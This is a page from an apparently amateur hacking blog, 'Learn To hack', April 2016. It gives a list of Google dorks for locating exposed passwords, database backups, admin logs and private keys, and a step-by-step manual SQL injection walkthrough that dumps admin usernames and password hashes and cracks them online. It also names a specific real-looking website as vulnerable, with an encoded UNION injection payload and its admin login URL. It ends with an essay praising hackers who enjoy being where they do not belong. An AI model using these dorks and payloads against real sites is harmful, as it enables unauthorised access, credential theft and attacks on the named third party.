Learn To hack : April 2016

Hacking Using Google Dork List

Hacking Using Google Dork List
Prerequisites: (This one is Easy!)
1. A modern webbrowser and a internet.
2. Time

[Level:Beginner]

Method 1: Facebook!We will be using a google dork to find usernames and passwords of many accounts including Facebook!

The Dork: intext:charset_test= email= default_persistent=

Enter that into Google, and you will be presented with several sites that have username and passwords lists!

Method 2: WordPress!

This will look for WordPress backup files Which do contain the passwords, and all data for the site!The Dork: filetype:sql inurl:wp - content/backup - *

Method 3: WWWBoard!

This will look for the user and passwords of WWWBoard usersThe Dork: inurl:/wwwboard/passwd.txt

Method 4: FrontPage!

This will find all users and passwords, similar to above.The Dork: ext:pwd inurl:(service | authors | administrators | users) "# - FrontPage - "

Method 5: Symfony!This finds database information and loginsThe Dork: inurl:config/databases.yml - trac - trunk - "Google Code" - source - repository

Method 6: TeamSpeak! (big one!!!!!)This will search for the server.dbs file (a Sqlite database file With the SuperAdmin username and password!!!)The Dork: server - dbs "intitle:index of"

Method 7: TeamSpeak2!!! (also big!)This will find the log file which has the Super Admin user and pass in the Top 100 lines. Look for "superadmin account info:"The Dork: "inurl:Teamspeak2_RC2/server.log"

Method 8: Get Admin pass!Simple dork which looks for all types of admin infoThe Dork: "admin account info" filetype:log

Method 9: Private keys! (not any more!) This will find any .pem files which contain private keys.The Dork: filetype:pem pem intext:private

And the Ultimate one, the regular directory full of passwords....

Method 10: The Dir of Passwords! Simple one!The Dork: intitle:"Index of..etc" passwd

Hacking Using Google Dork List

SQL Injection (Manually)

SQL Injection (Manually):-
Let’s Start:

Log on to http://www.website.com/news/news.php?id=130.
Basically we are going to send the queries through URL to get back results on screen accordingly. The motive is to

get name of table, name of colmun in which usernames and passwords are stored and finally fetching them. Instead of copying and pasting the long links, simply click on "click here” and open in new tab.
Step 1: Checking Sql Vulnerability.
First we have to check that website is vulnerable to sql attack or not.To Check SQL vulnerability add „ sign after the URL
http://www.website.com/news/news.php?id=130′
Now it will return to some sql error like:
"You have an error in sql syntax.!$#^&((__+)()*&^%^in line 23"

Step2: Find number of columns. Lets use "ORDER BY” clause here, it is used to sort the columns.Choose any number, say 10. Here I have assumed that number columns cant be more then 10.”–” is used for making anything after it comment.
Now go to site which is Vulnerable to SQL.http://www.Website.com/news/news.php?id=130 order by 10– Actually we instructed it sort the result by 10th column. But it returned us with an error,this means number of columns are less then 10. Lets replace it with 9.
http://www.website.com/news/news.php?id=130 order by 9. But again we got an error. This means number of columns are less than 9. Like this we keep on moving, until we don‟t get any error. Finally we reach on ‟6′

http://www.website.com/news/news.php?id=130 order by 6– we didn‟t get any error, this means there are 6 columns.
Step 3:Find vulnerable columns. Now lets use "UNION ALL” and "SELECT” command. Remember to put dash (-) before 130.http://www.website.com/news/news.php?id=-130 union select all 1,2,3,4,5,6–. We would get a couple of numbers on screen. The bold ones are the most vulnerable columns. In this case the most vulnerable is number 2.
Step 4: Find database version.
Replace the most vulnerable column with "@@version” or "verson()” (if first one doesn‟t work).

http://www.website.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6– We got the version on screen. It is. The only thing to note is that version is 5 point something that is greater than 5. We would have followed some other approach in case the version would be less than 5 because there is no database by default like "information_schema” which stores information about tables/columns of other databases. in version less than 5.
Step 5: Finding table names.
Replace vulnerable column no. with "table_name”.http://www.website.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()–

We got first table name on the screen.
To get all tables use group_concat
http://www.website.com/news/news.php?id=-130 union select
all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–
Step 6:Finding column names.
Similar get all the columns by simply replacing „table‟ with „column‟http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()– There is a repeating element like in this case is „id‟ .From

it, we come to know which table number has which columns.
Step 7:Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password. These columns are in first table that is tar_admin. "0x3a” is used simply to insert a colon in result to separate it, it is hex of colon.
http://www.website.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin–.

So finally we got the usernames and passwords on screen. But passwords are encrypted. Mostly these encryptions are crackable. Lets choose any username say "Sneds”. The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15 .
Lets logon to http://md5crack.com/crackmd5.php or http://www.md5d ecrypter.co.uk and put the hashed(encrypted) password here. And it would crack for us. We got „oorwullie‟ in result ( password in clear text).
Note:Hashes are type of encryptions which are irreversible. There are numberless online crackers available. Keep trying.

Sometimes very strong hashes can not be cracked. Login page of website: So you got the key, where is lock now ? Most of the websites have login pages at default locations. There is any website, saywww.xyz.com. The login page would be at www.xyz.com/admin ,www.xyz.com/administrator , www.xyz.com/adminlogin etc. Download this admin page finder

Example of Injection

www.bitaraf.com

http://www.bitaraf.com/showlink.php?id=.1244923%injecthere (vulnerable )

http://www.bitaraf.com/showlink.php?id=.1244923+%2F%2A%2150000UnIOn%2A%2F+SeLEct+1%2Cconcat%280x3c2f7469746c653e3c666f6e7420636f6c6f723d7265643e4164657368206861786f723c62723e%2Cuser%28%29%2C0x3c62723e%2Cversion%28%29%2C0x3c62723e%2Cdatabase%28%29%2C0x3c62723e%2Cmake_set%286%2C%40%3A%3D0x0a%2C%28select%281%29from%28information_schema.columns%29where%40%3A%3Dmake_set%28511%2C%40%2C0x3c6c693e%2Ctable_name%2Ccolumn_name%29%29%2C%40%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10--+

ADMIN PANNEL

:bitaraf.com/admin/login.php

7 Qualities of Highly Effective Hackers

When asked to write on this topic, I admit that it made me fringe just a bit. Because I don't consider myself to be a highly effective hacker. I find myself as a noob everywhere that I'm trying to learn new things, or I am frustrated with the most ridiculous "hacker" material on the web, written by school-taught programmers that follow step by step instructions out of a manual that everyone has already read. Then I thought to myself.. "That's it!" That is Number One!

Quality One- Always A N00b

Yea. You heard it, and it sounds crazy, but do you ever wonder why on the forums and comments you always see the trolls calling the weakest link a noob and picking on them.. and then THEY are revealed to be newbies also? Well guess what? I am ALWAYS in over my head, trying to learn things that are too much for me. When I go through phases where I only visit sites and forums where I already am adept at the subject or skill level, at hand, I find that not only have months gone by without me learning anything new.

I have also gotten rusty at things I was beginning to learn. So as crazy as it sounds, I believe that a highly effective hacker is always in places where he is a noob. Always learning things he had no idea of and constantly finding things that overwhelm his mind, until a week later when he is now teaching others how to do it and busy with something else he doesn't yet understand. This is the way of intellectual progress. When you see guys on these forums and blog comments, picking on newbies and boasting the same skills with nothing new, know that they are at their peak. Their time has come and gone because they have settled for what they know and are satisfied with it in an ever evolving and changing world of technology.

Quality Two- Curiosity

Do you think for a moment that the l33t ones out there, finding new exploits and breaking into systems are just following step by step guides or motivated by their job or a pay check? If so, I am sorry to rain on your parade, but an effective hacker has an obsessive curiosity.

These personal drives will bring a person farther in skill than the need for a promotion or recognition will. "I wonder what would happen if I tried to.." "What do you suppose they keep in here.." "OMG! What if I trick it into running this as a..." These are the basic thought patterns of an effective hacker. Not just when he has a job to do. I mean always. For example when you were a kid (or even now) played a video game and found a weird glitch (not necessarily a 'cheat') that you thought was funny. "Oh wow. If I walk in this corner backward he kinda gets stuck there.. UPSIDE DOWN! LOL", "What would happen if I do that and try to jump at the same time? Oh weird! It drops my character where I'm not even supposed to be yet!". OK This is the curiosity that intrigues an effective hacker. He wants to make things work in ways they were not originally intended to.

Quality Three- Enjoys being places he doesn't belong

Hey sorry all you white-hats out there, but it's true. I won't condone trespassing, but many of the most effective hackers get serious pleasure out of being places they do not belong. I once read that everything that drives a man is a form of penetration, of inserting what he feels is himself into something he feels is not himself. I don't know about all that, but some of these guys get pleasure in the same way that a voyeur enjoys watching what he is not allowed to. They enjoy getting into places they are not supposed to be. Now I am not encouraging this behaviour, just laying out the facts. The reason these people find ways to get into things is because these fundamental, basic drives compel them to. It closes the gap of all the things he must learn in order to achieve what he wants.

Quality Four-An unbalanced lifestyle

I often find myself engorged in a project (not just computer related) and nothing else exists. If you ever see these skinny or fat guys beating at their computer at 3 in the morning with empty coke cans and full ashtrays all around until they finally call it a day.. and then it's time to go back in to work. That's them. LOL Now I am not saying that being an effective hacker means they do not have a life (though some may not). Alot of very successful people get obsessed with what they are working on and do nothing but that.. For a while. Then they go through a phase where they are obsessed with something different.

Quality Five- Likes to break things

Come on guys! We're hackers! We love to smash things apart and see what happens. Because face it, it's much easier to break something than to make it and it rewards a valuable opportunity to put it back together in a different way.

Quality Six- Well Organized

In the beginning, it's ok to have files, folders, projects, and programs littered amongst temporary directories, hard drives and OS's. But eventually that's going to be a huge problem. The most efficient hackers have definitely learned to become very well organized multitaskers. You'll see varions windows and terminals open, seperate directories for everything, that are well categorized, a task manager changing process priorities as he's bouncing from one project to the other, across his screen.

Quality Seven- Everything is Insecure until... Never.

The most efficient hackers know that all software, hardware, and access controls are man made and riddled with flaws, predictabilities, and unpredictabilities, a reflection of the creators. People. Nothing can ever be completely trusted, just as no person can be completely trusted.